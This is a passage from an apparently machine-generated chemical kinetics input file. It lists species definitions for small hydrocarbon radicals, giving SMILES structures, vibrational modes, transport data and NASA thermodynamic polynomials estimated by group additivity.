energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[2.05266,0.0371709,-7.10649e-06,-1.96893e-08,1.19932e-11,38774.1,18.6599], Tmin=(100,'K'), Tmax=(877.4,'K')), NASAPolynomial(coeffs=[9.62985,0.0193968,-5.38942e-06,7.89676e-10,-4.88604e-14,36799,-20.583], Tmin=(877.4,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(321.758,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(270.22,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(Cs-CtCsCsH) + group(Cs-CsHHH) + group(Cs-CsHHH) + group(Ct-CtCs) + group(Ct-CtH) + radical(Isobutyl)"""),
)
species(
label = '[CH3](11)',
structure = SMILES('[CH3]'),
E0 = (135.382,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([570.572,1408.13,1408.49,4000,4000,4000],'cm^-1')),
],
spinMultiplicity = 2,
opticalIsomers = 1,
molecularWeight = (15.0345,'amu'),
collisionModel = TransportData(shapeIndex=2, epsilon=(1197.29,'J/mol'), sigma=(3.8,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0.0, comment="""GRI-Mech"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[3.91547,0.00184154,3.48742e-06,-3.32748e-09,8.49957e-13,16285.6,0.351741], Tmin=(100,'K'), Tmax=(1337.63,'K')), NASAPolynomial(coeffs=[3.54146,0.00476787,-1.82148e-06,3.28877e-10,-2.22546e-14,16224,1.66035], Tmin=(1337.63,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(135.382,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(108.088,'J/(mol*K)'), comment="""Thermo library: primaryThermoLibrary + radical(CH3)"""),
)
species(
label = '[CH]C(=[CH])C=C(19261)',
structure = SMILES('[CH]C(=[CH])C=C'),
E0 = (674.111,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([3120,650,792.5,1650,2950,3100,1380,975,1025,1650,350,440,435,1725,3010,987.5,1337.5,450,1655,180,180,180],'cm^-1')),
HinderedRotor(inertia=(2.10119,'amu*angstrom^2'), symmetry=1, barrier=(48.3106,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(2.0992,'amu*angstrom^2'), symmetry=1, barrier=(48.2648,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 4,
opticalIsomers = 1,
molecularWeight = (65.0932,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[1.78075,0.0401882,-8.76075e-06,-1.97193e-08,1.12783e-11,81164.5,17.38], Tmin=(100,'K'), Tmax=(955.832,'K')), NASAPolynomial(coeffs=[12.0562,0.0178508,-6.13458e-06,1.06669e-09,-7.39864e-14,78256.3,-36.6668], Tmin=(955.832,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(674.111,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(224.491,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(Cs-(Cds-Cds)HHH) + group(Cds-Cds(Cds-Cds)Cs) + group(Cds-Cds(Cds-Cds)H) + group(Cds-CdsHH) + group(Cds-CdsHH) + radical(Cds_P) + radical(AllylJ2_triplet)"""),
)
species(
label = '[CH][C]=[CH](21256)',
structure = SMILES('[CH][C]=[CH]'),
E0 = (861.746,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([1685,370,3120,650,792.5,1650,180,180],'cm^-1')),
HinderedRotor(inertia=(2.1891,'amu*angstrom^2'), symmetry=1, barrier=(50.3317,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 5,
opticalIsomers = 1,
molecularWeight = (38.048,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[3.18317,0.0164338,-7.13252e-06,1.19383e-09,-3.27944e-14,103675,12.0918], Tmin=(100,'K'), Tmax=(1799.19,'K')), NASAPolynomial(coeffs=[6.32962,0.0112581,-4.33439e-06,7.19107e-10,-4.49321e-14,102248,-5.75439], Tmin=(1799.19,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(861.746,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(103.931,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(Cs-(Cds-Cds)HHH) + group(Cds-CdsCsH) + group(Cds-CdsHH) + radical(Cds_P) + radical(Cds_S) + radical(AllylJ2_triplet)"""),
)
species(
label = '[CH2][CH]C(44)',
structure = SMILES('[CH2][CH]C'),
E0 = (279.046,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([2750,2800,2850,1350,1500,750,1050,1375,1000,3000,3100,440,815,1455,1000,3025,407.5,1350,352.5],'cm^-1')),
HinderedRotor(inertia=(0.00418548,'amu*angstrom^2'), symmetry=1, barrier=(6.91848,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.00418537,'amu*angstrom^2'), symmetry=1, barrier=(6.91838,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 3,
opticalIsomers = 1,
molecularWeight = (42.0797,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[3.25505,0.0137285,1.00536e-05,-1.43788e-08,4.3875e-12,33590.4,14.1736], Tmin=(100,'K'), Tmax=(1201.86,'K')), NASAPolynomial(coeffs=[3.74312,0.0203097,-8.40105e-06,1.5386e-09,-1.05137e-13,32880.4,9.26373], Tmin=(1201.86,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(279.046,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(199.547,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(Cs-CsCsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + radical(RCCJ) + radical(CCJC)"""),
)
species(
label = '[CH]C([CH])=C(C)C(21272)',
structure = SMILES('[CH]C([CH])=C(C)C'),
E0 = (633.357,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([2750,2770,2790,2810,2830,2850,1350,1400,1450,1500,700,800,1000,1100,1350,1400,900,1100,325,375,415,465,420,450,1700,1750,200,800,1000,1200,1400,1600],'cm^-1')),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 5,
opticalIsomers = 1,
molecularWeight = (80.1277,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[1.34145,0.0595696,-3.30538e-05,9.11995e-09,-1.06436e-12,76268.9,22.2278], Tmin=(100,'K'), Tmax=(1774.5,'K')), NASAPolynomial(coeffs=[9.96714,0.0401259,-1.66178e-05,2.94502e-09,-1.944e-13,73207.7,-24.3331], Tmin=(1774.5,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(633.357,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(315.95,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(Cs-(Cds-Cds)HHH) + group(Cs-(Cds-Cds)HHH) + group(Cs-(Cds-Cds)HHH) + group(Cs-(Cds-Cds)HHH) + group(Cds-CdsCsCs) + group(Cds-CdsCsCs) + radical(AllylJ2_triplet) + radical(AllylJ2_triplet)"""),
)
species(
label = '[CH]C([CH2])=C([CH2])C(18079)',
structure = SMILES('[CH]C([CH2])=C([CH2])C'),
E0 = (565.671,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([2750,2800,2850,1350,1500,750,1050,1375,1000,325,375,415,465,420,450,1700,1750,3000,3033.33,3066.67,3100,415,465,780,850,1435,1475,900,1100,435.027,435.118,435.22],'cm^-1')),
HinderedRotor(inertia=(0.381444,'amu*angstrom^2'), symmetry=1, barrier=(51.1879,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.381355,'amu*angstrom^2'), symmetry=1, barrier=(51.1799,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.380777,'amu*angstrom^2'), symmetry=1, barrier=(51.1824,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.380691,'amu*angstrom^2'), symmetry=1, barrier=(51.1758,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 5,
opticalIsomers = 1,
molecularWeight = (80.1277,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[0.908188,0.0595149,-3.25415e-05,3.40661e-09,2.0794e-12,68152.9,23.256], Tmin=(100,'K'), Tmax=(1101.48,'K')), NASAPolynomial(coeffs=[12.3301,0.0313888,-1.24226e-05,2.23507e-09,-1.52544e-13,64826.7,-36.6291], Tmin=(1101.48,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(565.671,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(315.95,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(Cs-(Cds-Cds)HHH) + group(Cs-(Cds-Cds)HHH) + group(Cs-(Cds-Cds)HHH) + group(Cs-(Cds-Cds)HHH) + group(Cds-CdsCsCs) + group(Cds-CdsCsCs) + radical(Allyl_P) + radical(AllylJ2_triplet) + radical(Allyl_P)"""),
)
species(
label = '[CH]C(=C)C([CH2])[CH2](17727)',
structure = SMILES('[CH]C(=C)C([CH2])[CH2]'),
E0 = (697.704,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([3000,3033.33,3066.67,3100,415,465,780,850,1435,1475,900,1100,2950,3100,1380,975,1025,1650,1380,1390,370,380,2900,435,350,440,435,1725,623.021,623.022,623.022,623.023],'cm^-1')),
HinderedRotor(inertia=(0.200176,'amu*angstrom^2'), symmetry=1, barrier=(55.1377,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.200177,'amu*angstrom^2'), symmetry=1, barrier=(55.1377,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.200176,'amu*angstrom^2'), symmetry=1, barrier=(55.1376,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.200175,'amu*angstrom^2'), symmetry=1, barrier=(55.1377,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 5,
opticalIsomers = 1,
molecularWeight = (80.1277,'amu'),
collisionModel = TransportData(shapeIndex=2, epsilon=(3248.85,'J/mol'), sigma=(5.90911,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0, comment="""Epsilon & sigma estimated with Tc=507.46 K, Pc=35.73 bar (from Joback method)"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[1.21023,0.0555238,-2.63652e-05,-4.35895e-09,6.27756e-12,84020.2,26.8273], Tmin=(100,'K'), Tmax=(923.387,'K')), NASAPolynomial(coeffs=[10.335,0.0309114,-1.06121e-05,1.76031e-09,-1.15182e-13,81699.2,-19.9103], Tmin=(923.387,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(697.704,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(315.95,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(Cs-(Cds-Cds)CsCsH) + group(Cs-CsHHH) + group(Cs-CsHHH) + group(Cs-(Cds-Cds)HHH) + group(Cds-CdsCsCs) + longDistanceInteraction_noncyclic(CdCs-ST) + group(Cds-CdsHH) + radical(Isobutyl) + radical(AllylJ2_triplet) + radical(Isobutyl)"""),
)
species(
label = '[CH]C([CH])=C[CH2](21258)',
structure = SMILES('[CH]C([CH])=C[CH2]'),
E0 = (823.911,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([3000,3100,440,815,1455,1000,3010,987.5,1337.5,450,1655,350,440,435,1725,328.03,328.033,328.034,328.035,328.036,328.04],'cm^-1')),
HinderedRotor(inertia=(0.664758,'amu*angstrom^2'), symmetry=1, barrier=(50.762,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.664777,'amu*angstrom^2'), symmetry=1, barrier=(50.7619,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.664772,'amu*angstrom^2'), symmetry=1, barrier=(50.7618,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 6,
opticalIsomers = 1,
molecularWeight = (65.0932,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[1.78722,0.0415433,-8.93762e-06,-1.22359e-08,6.20359e-12,99179.3,20.1709], Tmin=(100,'K'), Tmax=(1059.47,'K')), NASAPolynomial(coeffs=[8.69747,0.0295269,-1.18496e-05,2.13401e-09,-1.45711e-13,96925.3,-17.2938], Tmin=(1059.47,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(823.911,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(220.334,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(Cs-(Cds-Cds)HHH) + group(Cs-(Cds-Cds)HHH) + group(Cs-(Cds-Cds)HHH) + group(Cds-CdsCsCs) + group(Cds-CdsCsH) + radical(AllylJ2_triplet) + radical(Allyl_P) + radical(AllylJ2_triplet)"""),
)
species(
label = '[CH]C([CH])=C([CH2])C(19692)',
structure = SMILES('[CH]C([CH])=C([CH2])C'),
E0 = (784.856,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([2750,2800,2850,1350,1500,750,1050,1375,1000,325,375,415,465,420,450,1700,1750,3000,3100,440,815,1455,1000,200,800,1000,1200,1400,1600],'cm^-1')),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 6,
opticalIsomers = 1,
molecularWeight = (79.1198,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[0.948164,0.0613832,-3.83155e-05,1.23014e-08,-1.65031e-12,94510.7,23.945], Tmin=(100,'K'), Tmax=(1662.91,'K')), NASAPolynomial(coeffs=[12.3948,0.0338493,-1.3479e-05,2.34436e-09,-1.53386e-13,90703.8,-37.0999], Tmin=(1662.91,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(784.856,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(291.007,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(Cs-(Cds-Cds)HHH) + group(Cs-(Cds-Cds)HHH) + group(Cs-(Cds-Cds)HHH) + group(Cs-(Cds-Cds)HHH) + group(Cds-CdsCsCs) + group(Cds-CdsCsCs) + radical(AllylJ2_triplet) + radical(AllylJ2_triplet) + radical(Allyl_P)"""),
)
species(
label = '[CH]C(=[CH])C([CH2])[CH2](19200)',
structure = SMILES('[CH]C(=[CH])C([CH2])[CH2]'),
E0 = (944.8,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([3000,3033.33,3066.67,3100,415,465,780,850,1435,1475,900,1100,3120,650,792.5,1650,1380,1390,370,380,2900,435,350,440,435,1725,492.573,492.856,493.377],'cm^-1')),
HinderedRotor(inertia=(0.00069575,'amu*angstrom^2'), symmetry=1, barrier=(0.119627,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.310712,'amu*angstrom^2'), symmetry=1, barrier=(53.542,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.31084,'amu*angstrom^2'), symmetry=1, barrier=(53.541,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.310118,'amu*angstrom^2'), symmetry=1, barrier=(53.5398,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 6,
opticalIsomers = 1,
molecularWeight = (79.1198,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[1.16628,0.0586672,-4.15569e-05,1.0902e-08,1.3757e-12,113739,26.6969], Tmin=(100,'K'), Tmax=(889.962,'K')), NASAPolynomial(coeffs=[10.5201,0.0281773,-9.63713e-06,1.57586e-09,-1.01524e-13,111616,-19.9098], Tmin=(889.962,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(944.8,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(291.007,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(Cs-(Cds-Cds)CsCsH) + group(Cs-CsHHH) + group(Cs-CsHHH) + group(Cs-(Cds-Cds)HHH) + group(Cds-CdsCsCs) + longDistanceInteraction_noncyclic(CdCs-ST) + group(Cds-CdsHH) + radical(AllylJ2_triplet) + radical(Isobutyl) + radical(Isobutyl) + radical(Cds_P)"""),
)
species(
label = '[CH]C(=C)C(=C)C(18075)',
structure = SMILES('[CH]C(=C)C(=C)C'),
E0 = (389.424,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([2750,2800,2850,1350,1500,750,1050,1375,1000,325,375,415,465,420,450,1700,1750,2950,3000,3050,3100,1330,1430,900,1050,1000,1050,1600,1700,180,180,180,180],'cm^-1')),
HinderedRotor(inertia=(2.14161,'amu*angstrom^2'), symmetry=1, barrier=(49.2399,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(2.14261,'amu*angstrom^2'), symmetry=1, barrier=(49.2628,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(2.14146,'amu*angstrom^2'), symmetry=1, barrier=(49.2363,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 3,
opticalIsomers = 1,
molecularWeight = (80.1277,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[0.986292,0.0569524,-2.36192e-05,-8.84439e-09,7.31756e-12,46953.6,21.1224], Tmin=(100,'K'), Tmax=(1006.49,'K')), NASAPolynomial(coeffs=[12.9227,0.0289714,-1.09157e-05,1.94828e-09,-1.34051e-13,43565.3,-41.437], Tmin=(1006.49,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(389.424,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(320.107,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(Cs-(Cds-Cds)HHH) + group(Cs-(Cds-Cds)HHH) + group(Cds-Cds(Cds-Cds)Cs) + group(Cds-Cds(Cds-Cds)Cs) + group(Cds-CdsHH) + group(Cds-CdsHH) + radical(AllylJ2_triplet)"""),
)
species(
label = 'CH2(S)(14)',
structure = SMILES('[CH2]'),
E0 = (419.091,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([1369.93,2896.01,2896.03],'cm^-1')),
],
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (14.0266,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[4.10264,-0.00144068,5.45069e-06,-3.58002e-09,7.56192e-13,50400.6,-0.411765], Tmin=(100,'K'), Tmax=(1442.36,'K')), NASAPolynomial(coeffs=[2.62648,0.00394763,-1.49924e-06,2.54539e-10,-1.62956e-14,50691.8,6.78378], Tmin=(1442.36,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(419.091,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(58.2013,'J/(mol*K)'), label="""CH2(S)""", comment="""Thermo library: primaryThermoLibrary"""),
)
species(
label = '[CH]C(=[CH])C[CH2](18837)',
structure = SMILES('[CH]C(=[CH])C[CH2]'),
E0 = (767.45,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([3120,650,792.5,1650,2750,2850,1437.5,1250,1305,750,350,350,440,435,1725,3000,3100,440,815,1455,1000,498.567,499.809,501.077],'cm^-1')),
HinderedRotor(inertia=(0.291866,'amu*angstrom^2'), symmetry=1, barrier=(52.092,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.293908,'amu*angstrom^2'), symmetry=1, barrier=(52.1161,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.29664,'amu*angstrom^2'), symmetry=1, barrier=(52.0336,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 5,
opticalIsomers = 1,
molecularWeight = (66.1011,'amu'),
collisionModel = TransportData(shapeIndex=2, epsilon=(3074.1,'J/mol'), sigma=(5.55822,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0, comment="""Epsilon & sigma estimated with Tc=480.17 K, Pc=40.62 bar (from Joback method)"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[1.65878,0.0455874,-2.94386e-05,9.8193e-09,-1.35238e-12,92392,21.8548], Tmin=(100,'K'), Tmax=(1655.31,'K')), NASAPolynomial(coeffs=[11.0697,0.0228462,-8.83111e-06,1.51975e-09,-9.89077e-14,89276.4,-28.2906], Tmin=(1655.31,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(767.45,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(245.277,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(Cs-(Cds-Cds)CsHH) + group(Cs-CsHHH) + group(Cs-(Cds-Cds)HHH) + group(Cds-CdsCsCs) + group(Cds-CdsHH) + radical(AllylJ2_triplet) + radical(Cds_P) + radical(RCCJ)"""),
)
species(
label = '[CH]C([CH])=CCC(21273)',
structure = SMILES('[CH]C([CH])=CCC'),
E0 = (649.766,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (80.1277,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[1.03631,0.056981,-2.30081e-05,-1.43386e-09,2.37915e-12,78262.2,25.5066], Tmin=(100,'K'), Tmax=(1214.05,'K')), NASAPolynomial(coeffs=[10.1548,0.0390469,-1.5811e-05,2.82965e-09,-1.90572e-13,75155.8,-23.9289], Tmin=(1214.05,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(649.766,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(315.95,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(Cs-(Cds-Cds)CsHH) + group(Cs-CsHHH) + group(Cs-(Cds-Cds)HHH) + group(Cs-(Cds-Cds)HHH) + group(Cds-CdsCsCs) + group(Cds-CdsCsH) + radical(AllylJ2_triplet) + radical(AllylJ2_triplet)"""),
)
species(
label = '[CH]C(=[CH])C[CH]C(18912)',
structure = SMILES('[CH]C(=[CH])C[CH]C'),
E0 = (732.87,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([3025,407.5,1350,352.5,2750,2850,1437.5,1250,1305,750,350,350,440,435,1725,3120,650,792.5,1650,2750,2800,2850,1350,1500,750,1050,1375,1000,514.385,514.912,516.225,516.862],'cm^-1')),
HinderedRotor(inertia=(0.000621478,'amu*angstrom^2'), symmetry=1, barrier=(0.119627,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.282893,'amu*angstrom^2'), symmetry=1, barrier=(53.891,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.283783,'amu*angstrom^2'), symmetry=1, barrier=(53.7954,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.298436,'amu*angstrom^2'), symmetry=1, barrier=(53.944,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 5,
opticalIsomers = 1,
molecularWeight = (80.1277,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[1.65953,0.0543528,-3.41486e-05,1.21485e-08,-1.99454e-12,88225.5,25.0313], Tmin=(100,'K'), Tmax=(1266.28,'K')), NASAPolynomial(coeffs=[6.23748,0.0398916,-1.70181e-05,3.12966e-09,-2.13952e-13,87066.1,1.86455], Tmin=(1266.28,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(732.87,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(315.95,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(Cs-CsCsHH) + group(Cs-(Cds-Cds)CsHH) + group(Cs-CsHHH) + group(Cs-(Cds-Cds)HHH) + group(Cds-CdsCsCs) + group(Cds-CdsHH) + radical(Cds_P) + radical(AllylJ2_triplet) + radical(RCCJC)"""),
)
species(
label = '[CH]C1=CCC1C(21274)',
structure = SMILES('[CH]C1=CCC1C'),
E0 = (444.345,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (80.1277,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[1.88991,0.0288127,5.7306e-05,-9.17238e-08,3.62878e-11,53534.2,20.0457], Tmin=(100,'K'), Tmax=(965.058,'K')), NASAPolynomial(coeffs=[12.5588,0.0283833,-1.00919e-05,1.85478e-09,-1.34496e-13,49435.7,-41.6113], Tmin=(965.058,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(444.345,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(324.264,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(Cs-(Cds-Cds)CsCsH) + group(Cs-(Cds-Cds)CsHH) + group(Cs-CsHHH) + group(Cs-(Cds-Cds)HHH) + group(Cds-CdsCsCs) + group(Cds-CdsCsH) + ring(Cyclobutene) + radical(AllylJ2_triplet)"""),
)
species(
label = 'CH2(T)(28)',
structure = SMILES('[CH2]'),
E0 = (381.37,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([1066.91,2790.99,3622.37],'cm^-1')),
],
spinMultiplicity = 3,
opticalIsomers = 1,
molecularWeight = (14.0266,'amu'),
collisionModel = TransportData(shapeIndex=2, epsilon=(1197.29,'J/mol'), sigma=(3.8,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0.0, comment="""GRI-Mech"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[4.01192,-0.000154979,3.26298e-06,-2.40422e-09,5.69497e-13,45867.7,0.5332], Tmin=(100,'K'), Tmax=(1104.58,'K')), NASAPolynomial(coeffs=[3.14983,0.00296674,-9.76056e-07,1.54115e-10,-9.50338e-15,46058.1,4.77808], Tmin=(1104.58,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(381.37,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(58.2013,'J/(mol*K)'), label="""CH2(T)""", comment="""Thermo library: primaryThermoLibrary"""),
)
species(
label = '[CH]C([CH])=CC(21257)',
structure = SMILES('[CH]C([CH])=CC'),
E0 = (672.412,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([2750,2800,2850,1350,1500,750,1050,1375,1000,3010,987.5,1337.5,450,1655,350,440,435,1725,302.964,302.964,302.966,302.968,302.978,302.992],'cm^-1')),
HinderedRotor(inertia=(0.783156,'amu*angstrom^2'), symmetry=1, barrier=(51.0103,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.783094,'amu*angstrom^2'), symmetry=1, barrier=(51.0102,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.783135,'amu*angstrom^2'), symmetry=1, barrier=(51.0104,'kJ/mol'), semiclassical=False),
],
